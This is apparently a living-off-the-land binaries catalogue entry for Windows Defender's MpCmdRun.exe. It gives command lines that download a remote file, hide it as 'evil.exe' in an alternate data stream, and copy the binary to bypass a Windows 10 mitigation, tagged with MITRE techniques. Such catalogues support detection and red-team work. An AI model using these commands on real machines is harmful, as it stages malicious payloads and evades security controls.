MpCmdRun.exe

Binary part of Windows Defender. Used to manage settings in Windows Defender

ADS

Hide downloaded data into an Alternate Data Stream

MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe

Download file to machine and store it in Alternate Data Stream — MITRE: T1564.004 — Privileges: User

Download

Download file

MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}

Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) — MITRE: T1105 — Privileges: User

Download file

copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe

Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation. — MITRE: T1105 — Privileges: User